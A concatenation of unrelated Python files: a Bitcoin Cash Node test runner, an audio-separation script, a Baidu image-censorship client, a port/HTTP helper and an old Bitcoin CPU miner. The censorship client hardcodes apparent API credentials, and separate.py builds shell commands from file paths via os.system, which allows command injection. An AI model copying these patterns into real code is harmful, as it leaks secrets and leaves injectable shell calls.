# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J', default='junit_results.xml',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin Cash Node functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t)
+ ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from scr_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(test_list, build_dir, tests_dir, args.junitoutput,
tmpdir, args.jobs, args.testsuitename, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime, test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
t.setDaemon(True)
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.setDaemon(True)
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
separate.py
|
import argparse
import os
import pathlib
import time
from typing import NoReturn
import threading
import numpy as np
import soundfile
import torch
from bytesep.models.lightning_modules import get_model_class
from bytesep.separator import Separator
from bytesep.utils import load_audio, read_yaml
def init_abn() -> NoReturn:
# Need to use torch.distributed if models contain inplace_abn.abn.InPlaceABNSync.
import torch.distributed as dist
dist.init_process_group(
'gloo', init_method='file:///tmp/somefile', rank=0, world_size=1
)
def build_separator(config_yaml: str, checkpoint_path: str, device: str) -> Separator:
r"""Build separator.
Args:
config_yaml: str
checkpoint_path: str
device: "cuda" | "cpu"
Returns:
separator: Separator
"""
# Read config file.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
input_channels = configs['train']['input_channels']
output_channels = configs['train']['output_channels']
target_source_types = configs['train']['target_source_types']
target_sources_num = len(target_source_types)
model_type = configs['train']['model_type']
segment_seconds = 30
segment_samples = int(segment_seconds * sample_rate)
batch_size = 1
print("Using {} for separating ..".format(device))
models_contains_inplaceabn = False
if models_contains_inplaceabn:
init_abn(models_contains_inplaceabn)
# Get model class.
Model = get_model_class(model_type)
# Create model.
model = Model(
input_channels=input_channels,
output_channels=output_channels,
target_sources_num=target_sources_num,
)
# Load checkpoint.
checkpoint = torch.load(checkpoint_path, map_location='cpu')
model.load_state_dict(checkpoint["model"])
# Move model to device.
model.to(device)
# Create separator.
separator = Separator(
model=model,
segment_samples=segment_samples,
batch_size=batch_size,
device=device,
)
return separator
def match_audio_channels(audio: np.array, input_channels: int) -> np.array:
r"""Match input audio to correct channels.
Args:
audio: (audio_channels, audio_segments)
input_channels: int
Returns:
(input_channels, audio_segments)
"""
audio_channels = audio.shape[0]
if audio_channels == input_channels:
return audio
elif audio_channels == 2 and input_channels == 1:
return np.mean(audio, axis=0)[None, :]
elif audio_channels == 1 and input_channels == 2:
return np.tile(audio, (2, 1))
else:
raise NotImplementedError
def separate_file(args) -> NoReturn:
r"""Separate a single file.
Args:
config_yaml: str, the config file of a model being trained.
checkpoint_path: str, the path of checkpoint to be loaded.
audio_path: str, path of file to be separated.
output_path: str, path of separated file to be written.
scale_volume: bool
cpu: bool
Returns:
NoReturn
"""
# Arguments & parameters
config_yaml = args.config_yaml
checkpoint_path = args.checkpoint_path
audio_path = args.audio_path
output_path = args.output_path
scale_volume = args.scale_volume
cpu = args.cpu
if cpu or not torch.cuda.is_available():
device = torch.device('cpu')
else:
device = torch.device('cuda')
# Read yaml files.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
input_channels = configs['train']['input_channels']
# Build Separator.
separator = build_separator(config_yaml, checkpoint_path, device)
# paths
if os.path.dirname(output_path) != "":
os.makedirs(os.path.dirname(output_path), exist_ok=True)
# Load audio.
audio = load_audio(audio_path=audio_path, mono=False, sample_rate=sample_rate)
# audio: (input_channels, audio_samples)
audio = match_audio_channels(audio, input_channels)
# audio: (input_channels, audio_samples)
input_dict = {'waveform': audio}
# Separate
separate_time = time.time()
sep_audio = separator.separate(input_dict)
# (input_channels, audio_samples)
print('Separate time: {:.3f} s'.format(time.time() - separate_time))
# Write out separated audio.
if scale_volume:
sep_audio /= np.max(np.abs(sep_audio))
# Write out separated audio.
tmp_wav_path = output_path + ".wav"
soundfile.write(file=tmp_wav_path, data=sep_audio.T, samplerate=sample_rate)
os.system(
'ffmpeg -y -loglevel panic -i "{}" "{}"'.format(tmp_wav_path, output_path)
)
os.system('rm "{}"'.format(tmp_wav_path))
print('Write out to {}'.format(output_path))
def separate_dir(args) -> NoReturn:
r"""Separate all audios in a directory.
Args:
config_yaml: str, the config file of a model being trained.
checkpoint_path: str, the path of checkpoint to be loaded.
audios_dir: str, the directory of audios to be separated.
output_dir: str, the directory to write out separated audios.
scale_volume: bool, if True then the volume is scaled to the maximum value of 1.
cpu: bool
Returns:
NoReturn
"""
# Arguments & parameters
config_yaml = args.config_yaml
checkpoint_path = args.checkpoint_path
audios_dir = args.audios_dir
outputs_dir = args.outputs_dir
scale_volume = args.scale_volume
cpu = args.cpu
if cpu or not torch.cuda.is_available():
device = torch.device('cpu')
else:
device = torch.device('cuda')
# Read yaml files.
configs = read_yaml(config_yaml)
sample_rate = configs['train']['sample_rate']
# Build separator.
separator = build_separator(config_yaml, checkpoint_path, device)
# paths
os.makedirs(outputs_dir, exist_ok=True)
audio_names = sorted(os.listdir(audios_dir))
audios_num = len(audio_names)
for n, audio_name in enumerate(audio_names):
audio_path = os.path.join(audios_dir, audio_name)
# Load audio.
audio = load_audio(audio_path=audio_path, mono=False, sample_rate=sample_rate)
input_dict = {'waveform': audio}
# Separate
separate_time = time.time()
sep_audio = separator.separate(input_dict)
# (input_channels, audio_samples)
print('Separate time: {:.3f} s'.format(time.time() - separate_time))
# Write out separated audio.
if scale_volume:
sep_audio /= np.max(np.abs(sep_audio))
output_path = os.path.join(
outputs_dir, '{}.mp3'.format(pathlib.Path(audio_name).stem)
)
tmp_wav_path = '{}.wav'.format(output_path)
soundfile.write(file=tmp_wav_path, data=sep_audio.T, samplerate=sample_rate)
command_1 = 'ffmpeg -y -loglevel panic -i "{}" "{}" \n rm "{}" \n echo {} / {}, Write out to {}'.format(tmp_wav_path, output_path, tmp_wav_path, n, audios_num, output_path)
t1 = threading.Thread(target=os.system, args=(command_1,))
t1.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest="mode")
parser_separate = subparsers.add_parser("separate_file")
parser_separate.add_argument(
"--config_yaml",
type=str,
required=True,
help="The config file of a model being trained.",
)
parser_separate.add_argument(
"--checkpoint_path", type=str, required=True, help="Checkpoint path."
)
parser_separate.add_argument(
"--audio_path",
type=str,
required=True,
help="The path of audio to be separated.",
)
parser_separate.add_argument(
"--output_path",
type=str,
required=True,
help="The path to write out separated audio.",
)
parser_separate.add_argument(
'--scale_volume',
action='store_true',
default=False,
help="Set this flag to scale separated audios to maximum value of 1.",
)
parser_separate.add_argument(
'--cpu',
action='store_true',
default=False,
help="Set this flag to use CPU.",
)
parser_separate_dir = subparsers.add_parser("separate_dir")
parser_separate_dir.add_argument(
"--config_yaml",
type=str,
required=True,
help="The config file of a model being trained.",
)
parser_separate_dir.add_argument(
"--checkpoint_path", type=str, required=True, help="Checkpoint path."
)
parser_separate_dir.add_argument(
"--audios_dir",
type=str,
required=True,
help="The directory of audios to be separated.",
)
parser_separate_dir.add_argument(
"--outputs_dir",
type=str,
required=True,
help="The directory to write out separated audios.",
)
parser_separate_dir.add_argument(
'--scale_volume',
action='store_true',
default=False,
help="Set this flag to scale separated audios to maximum value of 1.",
)
parser_separate_dir.add_argument(
'--cpu',
action='store_true',
default=False,
help="Set this flag to use CPU.",
)
args = parser.parse_args()
if args.mode == "separate_file":
separate_file(args)
elif args.mode == "separate_dir":
separate_dir(args)
else:
raise NotImplementedError
|
nude.py
|
from aip import AipImageCensor
from queue import Queue
import os
from threading import Thread
""" 你的 APPID AK SK """
APP_ID = '16417834'
API_KEY = 'Mrr6fjs7vg95aslKyMKpfa2k'
SECRET_KEY = 'EsMycqjPXC4mnauARQyGlESFSgxfOexa'
client = AipImageCensor(APP_ID, API_KEY, SECRET_KEY)
def check_file_content(file_path, q):
""" 读取图片 """
fp = open(file_path, 'rb')
""" 调用色情识别接口 """
result = client.imageCensorUserDefined(fp.read())
if result['conclusion'] == '不合规':
q.put(False)
else:
q.put(True)
def check_image(file_path):
q = Queue()
t = Thread(target=check_file_content, args=[file_path, q])
t.start()
return q.get()
|
network.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import socket
import SocketServer
import multiprocessing
import SimpleHTTPServer
import atexit
import logging
socketProcesses = []
assignedPorts = set()
@atexit.register
def cleanupSocketProcesses():
logging.debug("Killing socket processes.")
for process in socketProcesses:
process.join()
def getUnboundPort(host="", minRange=30000, maxRange=35000, socket_type=1, assignOnlyOnce=False):
for port in range(minRange, maxRange):
if port in assignedPorts:
continue
sd = socket.socket(type=socket_type)
try:
sd.bind((host, port))
except socket.error as err:
if err.errno != 48:
print(err.strerror)
sd = None
else:
sd.close()
if assignOnlyOnce:
assignedPorts.add(port)
return port
return -1
def runHTTPDThread():
port = getUnboundPort(minRange=8000, maxRange=9000)
httpd = SocketServer.TCPServer(("", port), SimpleHTTPServer.SimpleHTTPRequestHandler)
p = multiprocessing.Process(target=httpd.serve_forever, args=())
p.start()
socketProcesses.append(p)
return port
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 57016
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
